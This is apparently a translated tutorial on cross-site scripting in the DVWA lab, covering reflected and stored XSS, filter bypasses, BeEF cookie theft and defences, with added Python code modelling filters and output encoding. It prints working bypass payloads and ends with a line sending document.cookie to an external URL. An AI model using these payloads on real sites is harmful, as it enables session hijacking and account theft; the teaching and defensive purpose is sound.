2025-04-07 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article explains cross-site scripting (XSS): how reflected and stored XSS work, how to find and exploit them in DVWA with Burp Suite and BeEF, and how to defend against them.
Cross-site scripting (XSS) is an attack in which JavaScript is injected into a web page; when a user's browser renders that page, the embedded script runs inside the user's session and acts on the attacker's behalf. It is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets.
The intrusion process of reflected XSS:
The attacker sends the user a URL containing malicious JavaScript => the user opens the URL => the web application reflects the attacker's JavaScript into its response => the user's browser runs the script and sends session information to the attacker => the attacker uses that session information to interact with the web server as the user.
Attack steps:
(1) the user logs in to the web application normally and receives a session cookie
(2) the attacker sends the user a URL containing the attack code
(3) the user opens the URL
(4) the web server handles the request and copies the JavaScript from the URL into the response page; the user's browser then executes it (the script runs in the browser, in the origin of the vulnerable site, not on the server)
(5) the attack code can, for example, send the user's cookie to an attacker-controlled script such as cookie_save.php
(6) with the user's cookie, the attacker can log in as that user.
Harm: the attacker can make a malicious pop-up appear in the victim's browser, and can also place malicious code or malicious links in the injected script.
A simple proof of concept is alert("XSS"). If it is replaced with `<iframe src=http://127.0.0.1.exe>` and the file at that address is a Trojan horse, everyone who visits the page, the site administrator included, is served the Trojan.
Stored XSS intrusion process:
The attacker submits malicious code that the web application stores (for example in a comment or guest book) and serves back in its pages => users visit the page => the malicious JavaScript executes in each visitor's browser => important parameters such as the cookie are returned to the attacker.
Harm: the attacker can obtain the user's information, cookie and so on.
In this XSS experiment we use a pop-up window as the indicator, because a pop-up is the most visible sign that the injected script executed.
Reflected XSS
Open XSS (Reflected) in DVWA.
In the "What's your name?" field, whatever we enter is echoed back after "Hello". Take 1 as an example.
We can also enter an XSS script here; take `<script>alert(2)</script>` as an example.
This produces a pop-up. We then capture the request with Burp Suite and send it to the scanner, which returns the following results.
Next, let's look at the report for this result.
Vulnerability details (Issue detail):
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload arz4v<script>alert(1)</script>pxrmb was submitted in the name parameter and echoed back unmodified. Because the application neither filters nor encodes this input before placing it in the response, JavaScript can be injected into the application's page.
At the medium level, DVWA strips the script tag once, so it can be bypassed by nesting: the filter removes the inner `<script>` and the surrounding characters close up into a working tag (for example `<scr<script>ipt>alert("1")</script>`). In other words, the medium level filters the tag, but not repeatedly.
The medium-level source code:
At the high level, the method is to avoid the script tag altogether: an encoded javascript:alert("XSS") URL, placed in an attribute such as href, bypasses the filter.
The high-level source code:
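The DVWA source for these levels is not reproduced on this page, so here is an added Python model of the filter behaviour, written for this article rather than taken from DVWA (which is PHP). The medium and high filters are modelled on the single-pass str_replace and case-insensitive regular expression that DVWA's levels are known for, which is an assumption about the original; the payload strings are constructed. It shows why nesting beats the medium level, why the high level stops a plain javascript: href but not an entity-encoded one, and how output encoding ends the cat-and-mouse game regardless of payload.

```python
"""Added model of the DVWA reflected-XSS filter levels (not DVWA's PHP).

Assumption: medium removes the literal "<script>" in one non-recursive,
case-sensitive pass; high strips any "<...s...c...r...i...p...t" run
case-insensitively. The payload strings below are constructed for the demo.
"""
import html
import re

# High-level filter pattern: a '<' followed by s, c, r, i, p, t in order,
# with anything between them, ignoring case.
HIGH_RE = re.compile(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", re.IGNORECASE)


def filter_low(name: str) -> str:
    """Low: the input is echoed untouched."""
    return name


def filter_medium(name: str) -> str:
    """Medium: drop the literal tag once; the result is not re-scanned."""
    return name.replace("<script>", "")


def filter_high(name: str) -> str:
    """High: regex blacklist; removes <script>, <SCRIPT> and the nested trick."""
    return HIGH_RE.sub("", name)


def filter_hardened(name: str) -> str:
    """The real fix: encode on output so the browser only ever sees text.
    '&' is encoded too, so an entity-encoded payload cannot be re-decoded."""
    return html.escape(name, quote=True)


LEVELS = {
    "low": filter_low,
    "medium": filter_medium,
    "high": filter_high,
    "hardened": filter_hardened,
}


def render(level: str, name: str) -> str:
    """Build the 'Hello <name>' fragment the way the DVWA page does."""
    return f"<pre>Hello {LEVELS[level](name)}</pre>"


# Constructed payloads.
BASIC = "<script>alert(1)</script>"
# Nested: medium removes the inner <script> and the outer halves join up.
NESTED = "<scr<script>ipt>alert(1)</script>"
# Case trick: medium's replace is case-sensitive, high's regex is not.
UPPER = "<SCRIPT>alert(1)</SCRIPT>"
# No script tag, but "javascript" still contains s,c,r,i,p,t in order,
# so the high-level regex eats it.
JS_HREF = "<a href=\"javascript:alert('XSS')\">link</a>"
# Entity-encode one letter: the regex no longer sees s...c...r...i...p...t,
# but the browser decodes &#115; back to 's' before it resolves the URL.
ENCODED_HREF = "<a href=\"java&#115;cript:alert('XSS')\">link</a>"

PAYLOADS = (BASIC, NESTED, UPPER, JS_HREF, ENCODED_HREF)


def passes_unchanged(level: str) -> list:
    """Payloads that reach the page byte-for-byte intact at the given level."""
    return [p for p in PAYLOADS if LEVELS[level](p) == p]


if __name__ == "__main__":
    for level in LEVELS:
        print(f"== {level} ==")
        for payload in PAYLOADS:
            print(f"  {payload}\n    -> {render(level, payload)}")
```

Note that the nested payload does not pass the medium filter unchanged; it comes out as the working `<script>alert(1)</script>`, which is exactly the point. Against the hardened variant no payload survives, because the problem was never which tags to blacklist but that untrusted text was placed in an HTML context without encoding.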
Stored XSS
Browsers have an important security mechanism called the same-origin policy: a script from one origin cannot read the content, including document.cookie, of another origin. Because an XSS payload runs in the origin of the vulnerable site, it sits inside that boundary and can read the site's cookies. A cookie is data (usually an opaque session identifier, not something encrypted) that a website stores on the user's device in order to identify the user and track the session; it is held by the browser.
In a stored XSS the filter can also be bypassed through the href attribute, without a script tag.
For example: `<a href="javascript:alert('XSS')">link</a>`
Let's first open a tool called BeEF-XSS.
BeEF (Browser Exploitation Framework) is a professional browser exploitation framework for legitimate research and testing. It allows experienced penetration testers or system administrators to attack targets and, after a successful attack, hijack the browser session and run commands in it.
After we enter beef-xss on the terminal, the terminal shows the interface above and a browser page opens as well. The default username and password for the BeEF web interface are both beef.
We enter BeEF's hook in the stored XSS page of DVWA (BeEF prints the hook when it starts; by default it is a script tag that loads hook.js from port 3000 of the BeEF host). The following interface appears in BeEF.
After this, double-click 127.0.0.1 in the list of hooked browsers to open its page.
Then click Commands and type cookie in the search box.
Then select Get Cookie.
Then click Execute. The command returns the victim's cookie.
Background of the question (Issue background):
When data from a request is copied into the application's response in an unsafe manner, the vulnerability is reflected XSS. We can build a request that, if triggered by another user, runs our malicious JavaScript in that user's browser. The JavaScript can perform all kinds of operations, such as stealing the cookie and logging in with the victim's identity.
How XSS is delivered
1. A link containing the malicious URL is sent to the victim by e-mail or another messaging channel.
2. Malicious JavaScript is inserted into the comment area of a popular website (stored XSS).
3. The attacker creates a website open to everyone; when users visit it, it launches the XSS attack across domains with a GET or POST request to the vulnerable application.
The impact of XSS:
The impact of XSS depends on who is attacked and on whether the affected data and functions matter to other users or to other applications in the same domain. XSS in an unimportant location, one that is insensitive and has no authentication or controlled access, is of little use. In a critical place, such as one where the session cookie can be read, it threatens other applications as well and is judged dangerous. Likewise, when XSS is used for phishing, the page comes from the trusted site, so users trust it and security software does not warn; Trojans can then be used for further attacks.
Defense strategy:
1. Validate strictly at the point of input, for example the length of personal-information fields and a regular-expression match for e-mail addresses. This is what we commonly call a whitelist.
2. HTML-encode user-supplied data wherever it is output, replacing every character that is special in HTML. Restrict the HTML tags and attributes users may use in the application.
3. Remove `<script>` and similar tags.
4. Restrict the permitted input characters.
5. Remove quotation marks from input.
6. Decode input URLs first, then encode them.
7. Mark important cookies as HttpOnly.
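As an added example of points 1, 2, 6 and 7 above, not code from DVWA or from the original article, here is a Python implementation of a whitelist validator, a decode-then-check-then-encode routine for user-supplied links, an HttpOnly session cookie, and a stored-comment renderer that uses all three. The field name, the length limit, the allowed URL schemes and the sample inputs are assumptions made for this illustration.

```python
"""Added example of the defences listed above (not DVWA code).

Shows a whitelist validator for the name field, a decode-then-check-then-
encode routine for user-supplied links, an HttpOnly session cookie, and a
stored-comment renderer that uses all three. The field name, the length
limit, the allowed URL schemes and the sample inputs are assumptions made
for this illustration.
"""
import html
import re
from http.cookies import SimpleCookie
from typing import Optional
from urllib.parse import unquote

# Whitelist for a display name: letters, digits, space, dot, underscore,
# hyphen, 1-32 characters. Quotes and angle brackets are simply not allowed.
NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,32}$")

# Only absolute web links are accepted in user-supplied hrefs (assumption).
SAFE_SCHEMES = ("http", "https")


def validate_name(name: str) -> bool:
    """Reject anything outside the whitelist instead of trying to strip tags."""
    return NAME_RE.fullmatch(name) is not None


def safe_href(url: str) -> Optional[str]:
    """Decode, then check, then encode.

    A check on the raw string misses java&#115;cript: because the browser
    decodes character references in attribute values before it resolves the
    URL, and it also ignores tab/newline characters inside the scheme. So:
    undo HTML entities and any percent-encoding applied in transit, drop
    control characters and spaces for the scheme check, and only then
    compare the scheme with the whitelist. Return the HTML-encoded value
    for use inside a quoted href attribute, or None if the link is rejected.
    """
    decoded = unquote(html.unescape(url))
    compact = "".join(ch for ch in decoded if ord(ch) > 0x20)
    scheme, sep, _rest = compact.partition(":")
    if not sep or scheme.lower() not in SAFE_SCHEMES:
        return None
    return html.escape(decoded, quote=True)


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie with HttpOnly: document.cookie no longer exposes the session."""
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id
    cookie["PHPSESSID"]["path"] = "/"
    cookie["PHPSESSID"]["httponly"] = True
    return cookie.output(header="Set-Cookie:")


def render_comment(name: str, href: str) -> str:
    """Stored-XSS-safe comment: validated name, vetted link, encoded output."""
    if not validate_name(name):
        raise ValueError("name rejected by whitelist")
    link = safe_href(href)
    if link is None:
        raise ValueError("link rejected: scheme not allowed")
    return f'<p><a href="{link}">{html.escape(name, quote=True)}</a></p>'


if __name__ == "__main__":
    print(render_comment("Alice", "https://example.com/?q=<x>"))
    for bad in ("java&#115;cript:alert('XSS')", "java\tscript:alert(1)"):
        print(repr(bad), "->", safe_href(bad))
    print(session_cookie_header("abc123"))
```

HttpOnly does not stop the script from running; it only removes the cookie from what document.cookie can read, so the BeEF Get Cookie command above would come back empty for that cookie. Output encoding remains the primary control.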
Attack technique
Cookie-stealing XSS code:
`document.location='http://127.0.0.1/1.asp?msg='+document.cookie`
The above is how to understand XSS. If you want to learn more, follow the industry information channel.